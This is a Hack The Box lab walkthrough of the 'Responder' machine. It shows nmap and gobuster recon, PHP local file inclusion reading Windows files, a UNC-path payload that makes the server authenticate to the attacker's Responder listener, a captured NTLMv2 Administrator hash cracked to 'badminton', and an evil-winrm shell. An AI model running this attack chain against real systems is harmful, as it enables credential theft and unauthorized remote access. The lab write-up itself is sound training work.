https://app.hackthebox.com/machines/Responder/



Responder | Walkthrough

Reconnaissance

Using nmap to enumerate all open ports on the target:

nmap -sV -sC -p- -T4 10.129.28.209
port scanning
nopedawn@npdn ~/L/H/S/Responder> nmap -sV -sC -p- -T4 10.129.28.209
Starting Nmap 7.80 ( https://nmap.org ) at 2026-03-02 11:49 WIB
Host is up (0.70s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open  tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 401.32 seconds

After scanning, a few interesting TCP services are open:

  • Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) on port 80
  • Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) on port 5985
  • tcpwrapped on port 7680

It seems we are dealing with a Windows pentest.

If we visit the web service at 10.129.28.209, we are redirected to the unika.htb domain.

curl web service
nopedawn@npdn ~/L/H/S/Responder> curl -v 10.129.28.209
*   Trying 10.129.28.209:80...
* Connected to 10.129.28.209 (10.129.28.209) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.129.28.209
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 02 Mar 2026 05:10:07 GMT
< Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
< X-Powered-By: PHP/8.1.1
< Content-Length: 61
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host 10.129.28.209 left intact
<meta http-equiv="refresh" content="0;url=http://unika.htb/">

After some research, we have to add unika.htb to the hosts file at /etc/hosts.

nopedawn@npdn ~/L/H/S/Responder> echo "10.129.28.209 unika.htb" | sudo tee -a /etc/hosts
[sudo] password for nopedawn:
10.129.28.209 unika.htb

Now we can reach it via the unika.htb domain, and ping it:

pinging host
nopedawn@npdn ~/L/H/S/Responder> ping unika.htb
PING unika.htb (10.129.28.209) 56(84) bytes of data.
64 bytes from unika.htb (10.129.28.209): icmp_seq=1 ttl=126 time=361 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=2 ttl=126 time=2180 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=3 ttl=126 time=1170 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=4 ttl=126 time=374 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=5 ttl=126 time=228 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=6 ttl=126 time=1699 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=7 ttl=126 time=931 ms
^C
--- unika.htb ping statistics ---
8 packets transmitted, 7 received, 12.5% packet loss, time 7623ms
rtt min/avg/max/mdev = 227.915/991.873/2180.246/687.770 ms, pipe 3

I enumerated the web service and found that /index.php is accessible.

ⓘ gobuster scan version

I use Gobuster v2.0.1 here, which may be old or deprecated. If you are using Gobuster 3 or a later version, use the following command instead:

gobuster dir -u 10.129.28.209 -w /usr/share/wordlists/SecLists/Web-Content/common.txt

The only difference is the added dir argument.

enumerating host
nopedawn@npdn ~/L/H/S/Responder> gobuster -u 10.129.28.209 -w /usr/share/wordlists/SecLists/Web-Content/common.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.129.28.209/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/SecLists/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2026/03/02 12:25:55 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/aux (Status: 403)
/cgi-bin/ (Status: 403)
/com1 (Status: 403)
/com2 (Status: 403)
/com4 (Status: 403)
/com3 (Status: 403)
/con (Status: 403)
/css (Status: 301)
/img (Status: 301)
/inc (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/licenses (Status: 403)
/lpt2 (Status: 403)
/lpt1 (Status: 403)
/nul (Status: 403)
/phpmyadmin (Status: 403)
/prn (Status: 403)
/server-status (Status: 403)
/server-info (Status: 403)
/webalizer (Status: 403)
=====================================================
2026/03/02 12:30:42 Finished
=====================================================

Foothold

I noticed that changing the language option in the navbar menu produces a URL parameter like this:

http://unika.htb/index.php?page=french.html

If we change ?page=french.html to ?page=../, the response is an error:

curl error
nopedawn@npdn ~/L/H/S/Responder> curl -v http://unika.htb/index.php?page=../
*   Trying 10.129.28.209:80...
* Connected to unika.htb (10.129.28.209) port 80 (#0)
> GET /index.php?page=../ HTTP/1.1
> Host: unika.htb
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 02 Mar 2026 06:23:18 GMT
< Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
< X-Powered-By: PHP/8.1.1
< Content-Length: 307
< Content-Type: text/html; charset=UTF-8
<
<br />
<b>Warning</b>:  include(C:\xampp): Failed to open stream: Permission denied in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
<br />
<b>Warning</b>:  include(): Failed opening '../' for inclusion (include_path='\xampp\php\PEAR') in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
* Connection #0 to host unika.htb left intact

This looks exploitable.

After some exploration, I turned to nuclei, a tool by projectdiscovery that fuzzes and scans for a wide range of issues; it is a good way to automate black-box exploration.

nuclei fuzz
nopedawn@npdn ~/L/H/S/Responder> nuclei -u unika.htb

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.7.0

                projectdiscovery.io

[INF] Current nuclei version: v3.7.0 (latest)
[INF] Current nuclei-templates version: v10.3.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 9814
[INF] Executing 9812 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 2 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Templates clustered: 2240 (Reduced 2115 Requests)
[INF] Using Interactsh Server: oast.site
[http-trace:trace-request] [http] [info] http://unika.htb
[waf-detect:apachegeneric] [http] [info] http://unika.htb
[generic-windows-lfi] [http] [high] http://unika.htb/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini [paths="/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"]
[missing-sri] [http] [info] http://unika.htb/ ["http://fonts.googleapis.com/css?family=Roboto:400,700,500","http://fonts.googleapis.com/css?family=Lato:300,400"]
[form-detection] [http] [info] http://unika.htb
[apache-detect] [http] [info] http://unika.htb ["Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1"]
[openssl-detect] [http] [info] http://unika.htb ["OpenSSL/1.1.1m"]
[php-detect] [http] [info] http://unika.htb ["8.1.1"]
[old-copyright] [http] [info] http://unika.htb ["&copy; 2022 -"]
[http-missing-security-headers:referrer-policy] [http] [info] http://unika.htb
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://unika.htb
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://unika.htb
[http-missing-security-headers:strict-transport-security] [http] [info] http://unika.htb
[http-missing-security-headers:content-security-policy] [http] [info] http://unika.htb
[http-missing-security-headers:permissions-policy] [http] [info] http://unika.htb
[http-missing-security-headers:x-frame-options] [http] [info] http://unika.htb
[http-missing-security-headers:clear-site-data] [http] [info] http://unika.htb
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://unika.htb
[http-missing-security-headers:x-content-type-options] [http] [info] http://unika.htb
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://unika.htb
[tech-detect:bootstrap] [http] [info] http://unika.htb
[tech-detect:google-font-api] [http] [info] http://unika.htb
[tech-detect:php] [http] [info] http://unika.htb
[tech-detect:owl-carousel] [http] [info] http://unika.htb
[tech-detect:font-awesome] [http] [info] http://unika.htb
[tech-detect:animate.css] [http] [info] http://unika.htb
[cgi-printenv] [http] [medium] http://unika.htb/cgi-bin/printenv.pl
[caa-fingerprint] [dns] [info] unika.htb
[INF] Scan completed in 9m. 28 matches found.

Notice that ?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini is reachable: the page parameter is not sanitised, which leads to a Local File Inclusion (LFI) vulnerability.

curl win.ini
nopedawn@npdn ~/L/H/S/Responder> curl -v http://unika.htb/?page=../../../../../windows/win.ini
*   Trying 10.129.28.209:80...
* Connected to unika.htb (10.129.28.209) port 80 (#0)
> GET /?page=../../../../../windows/win.ini HTTP/1.1
> Host: unika.htb
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 02 Mar 2026 06:50:21 GMT
< Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
< X-Powered-By: PHP/8.1.1
< Content-Length: 92
< Content-Type: text/html; charset=UTF-8
<
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
* Connection #0 to host unika.htb left intact

WIN.INI is an initialization file employed in early versions of Microsoft Windows, starting from Windows 1.0 (1985), particularly Windows 3.x, to store user-configurable settings that define the operating environment, including desktop customization, input device behaviors, file associations, international formats, and multimedia configurations. (see more)

Another file that turned out to be accessible is the Windows hosts file:

?page=../../../../../../../../windows/system32/drivers/etc/hosts

curl hosts
nopedawn@npdn ~/L/H/S/Responder> curl -v http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
*   Trying 10.129.28.209:80...
* Connected to unika.htb (10.129.28.209) port 80 (#0)
> GET /index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
> Host: unika.htb
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 02 Mar 2026 07:04:26 GMT
< Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
< X-Powered-By: PHP/8.1.1
< Content-Length: 824
< Content-Type: text/html; charset=UTF-8
<
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
* Connection #0 to host unika.htb left intact

Findings:

  • /?page=../../../../../windows/win.ini
  • ?page=../../../../../../../../windows/system32/drivers/etc/hosts

These two findings are tagged as [high] severity.

If a web application is vulnerable to file inclusion, an attacker can supply a file path that references an SMB share hosted on their own server, allowing interaction over the SMB protocol. (see more)

Based on the previous port scan, we can enumerate the SMB service; the Responder tool can do this.

Run the Responder tool with python3, using the -I option to specify the interface you want to monitor. In this example, the interface I’m using is tun0.

ifconfig
nopedawn@npdn ~/L/H/S/Responder> ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.17.49  netmask █████████████  destination █████████████
        inet6 ██████████████████  prefixlen 64  scopeid 0x0<global>
        inet6 ████████████████████████  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 57  bytes 51227 (51.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 179  bytes 11072 (11.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Note: The IP address used here corresponds to the tun0 interface.

Then run it:

responder
nopedawn@npdn ~/L/H/S/Responder> sudo Responder/Responder.py -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[*] Tips jar:
    USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
    BTC  -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]
    DHCPv6                     [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.17.49]
    Responder IPv6             [fe80::666a:f562:e69:4402]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-7TUOJH6NVKN]
    Responder Domain Name      [ROKF.LOCAL]
    Responder DCE-RPC Port     [46606]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...

[!] Error starting SSL server on port 5986, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting SSL server on port 636, check permissions or other servers running.

After sending the payload (//10.10.17.49/somefile), we get an error like this:

nopedawn@npdn ~/L/H/S/Responder> curl -v http://unika.htb/index.php?page=//10.10.17.49/somefile
*   Trying 10.129.28.209:80...
* Connected to unika.htb (10.129.28.209) port 80 (#0)
> GET /index.php?page=//10.10.17.49/somefile HTTP/1.1
> Host: unika.htb
> User-Agent: curl/7.81.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 02 Mar 2026 08:32:16 GMT
< Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
< X-Powered-By: PHP/8.1.1
< Content-Length: 340
< Content-Type: text/html; charset=UTF-8
< 
<br />
<b>Warning</b>:  include(\\10.10.17.49\SOMEFILE): Failed to open stream: Permission denied in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
<br />
<b>Warning</b>:  include(): Failed opening '//10.10.17.49/somefile' for inclusion (include_path='\xampp\php\PEAR') in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
* Connection #0 to host unika.htb left intact

Back in Responder, we have successfully captured the hash:

hash captured
nopedawn@npdn ~/L/H/S/Responder> sudo Responder/Responder.py -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
...
[SMB] NTLMv2-SSP Client   : 10.129.28.209
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:3fb4916f3eb93a...

Next, we’ll use John the Ripper to crack it and retrieve the Administrator password.

Save the hash; in this case I saved it as somefile.hash.

somefile.hash
nopedawn@npdn ~/L/H/S/Responder> echo "Administrator::RESPONDER:3fb4916f3eb93a90:E257A5E859EF176146D73BE48E6FCE06:01010000000000008074458E59AADC01E4410496392EFC2C000000000200080052004F004B00460001001E00570049004E002D003700540055004F004A00480036004E0056004B004E0004003400570049004E002D003700540055004F004A00480036004E0056004B004E002E0052004F004B0046002E004C004F00430041004C000300140052004F004B0046002E004C004F00430041004C000500140052004F004B0046002E004C004F00430041004C00070008008074458E59AADC0106000400020000000800300030000000000000000100000000200000EFBD94854B15CF7BE0674A9A425500CEC250D7280712F3223E6E5FA806AC14F20A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310037002E00340039000000000000000000" > somefile.hash
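To see what the captured line actually contains, the following Python (an added example, not part of the walkthrough) splits the somefile.hash line into its fields and decodes the NTLMv2 blob's AV pairs following the MS-NLMP layout; it only parses and does not verify or crack the response. The decoded NbDomainName and NbComputerName are the names Responder advertised in its banner above (ROKF, WIN-7TUOJH6NVKN), and TargetName shows the web server was made to authenticate to cifs/10.10.17.49, the tun0 address Responder was listening on; that SPN is what a defender would look for when triaging such a capture.

```python
"""Decode a NetNTLMv2 line as printed by Responder into its fields, following the
NTLMv2_CLIENT_CHALLENGE and AV_PAIR layouts in MS-NLMP. Added example; it parses
the captured line only and does not verify or crack it."""
import struct
from datetime import datetime, timedelta, timezone

# The somefile.hash line from this walkthrough, split across lines for readability.
HASH_LINE = (
    "Administrator::RESPONDER:3fb4916f3eb93a90:E257A5E859EF176146D73BE48E6FCE06:"
    "01010000000000008074458E59AADC01E4410496392EFC2C00000000"
    "0200080052004F004B004600"
    "01001E00570049004E002D003700540055004F004A00480036004E0056004B004E00"
    "04003400570049004E002D003700540055004F004A00480036004E0056004B004E00"
    "2E0052004F004B0046002E004C004F00430041004C00"
    "0300140052004F004B0046002E004C004F00430041004C00"
    "0500140052004F004B0046002E004C004F00430041004C00"
    "070008008074458E59AADC01"
    "0600040002000000"
    "0800300030000000000000000100000000200000"
    "EFBD94854B15CF7BE0674A9A425500CEC250D7280712F3223E6E5FA806AC14F2"
    "0A00100000000000000000000000000000000000"
    "0900200063006900660073002F00310030002E00310030002E00310037002E0034003900"
    "0000000000000000"
)

# AvId values from MS-NLMP section 2.2.2.1 (AV_PAIR)
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
UTF16_IDS = {1, 2, 3, 4, 5, 9}  # string-valued pairs, UTF-16LE


def filetime_to_iso(ft: int) -> str:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to ISO 8601."""
    return (datetime(1601, 1, 1, tzinfo=timezone.utc)
            + timedelta(microseconds=ft // 10)).isoformat()


def parse_av_pairs(data: bytes) -> dict:
    """Walk the AV_PAIR list (AvId, AvLen, value) until MsvAvEOL (AvId 0)."""
    pairs, off = {}, 0
    while True:
        av_id, av_len = struct.unpack_from("<HH", data, off)
        off += 4
        if av_id == 0:
            return pairs
        value = data[off:off + av_len]
        off += av_len
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        if av_id in UTF16_IDS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 7:
            pairs[name] = filetime_to_iso(struct.unpack("<Q", value)[0])
        elif av_id == 6:
            pairs[name] = struct.unpack("<I", value)[0]
        else:
            pairs[name] = value.hex()


def parse_netntlmv2(line: str) -> dict:
    """Split user::domain:server_challenge:nt_proof:blob and decode the blob."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    # 28-byte header: RespType, HiRespType, Reserved1(2), Reserved2(4),
    # TimeStamp(8), ChallengeFromClient(8), Reserved3(4); AV pairs follow.
    _, _, _, _, timestamp, client_challenge, _ = struct.unpack("<BBHIQ8sI", blob[:28])
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "nt_proof": nt_proof, "timestamp": filetime_to_iso(timestamp),
            "client_challenge": client_challenge.hex(),
            "av": parse_av_pairs(blob[28:])}
```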

Crack it with JtR using the following command; the password is badminton.

john somefile.hash --wordlist=/usr/share/wordlists/rockyou.txt
jtr somefile.hash crack
nopedawn@npdn ~/L/H/S/Responder> john somefile.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
badminton        (Administrator)
1g 0:00:00:00 DONE (2026-03-02 15:41) 33.33g/s 341333p/s 341333c/s 341333C/s 123456..11221122
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

So the final credentials are administrator:badminton. Now let's move on to evil-winrm to get remote access:

evil-winrm remote
nopedawn@npdn ~/L/H/S/Responder> evil-winrm -i 10.129.28.209 -u administrator -p badminton

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

And voilà! We have the shell.

The flag is stored in C:\Users\mike\Desktop\flag.txt

cmd-shell
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
*Evil-WinRM* PS C:\Users\Administrator\Documents> type flag.txt
Cannot find path 'C:\Users\Administrator\Documents\flag.txt' because it does not exist.
At line:1 char:1
+ type flag.txt
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\Admini...uments\flag.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\..\
*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/9/2022   5:35 PM                Administrator
d-----          3/9/2022   5:33 PM                mike
d-r---        10/10/2020  12:37 PM                Public


*Evil-WinRM* PS C:\Users> cd mike
*Evil-WinRM* PS C:\Users\mike> dir


    Directory: C:\Users\mike


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/10/2022   4:51 AM                Desktop


*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> dir


    Directory: C:\Users\mike\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/10/2022   4:50 AM             32 flag.txt


*Evil-WinRM* PS C:\Users\mike\Desktop> type flag.txt
REDACTED
*Evil-WinRM* PS C:\Users\mike\Desktop>

Sources:

https://docs.projectdiscovery.io/templates/introduction
https://grokipedia.com/page/winini
https://www.sentinelone.com/cybersecurity-101/identity-security/windows-ntlm/
https://github.com/openwall/john
https://github.com/Hackplayers/evil-winrm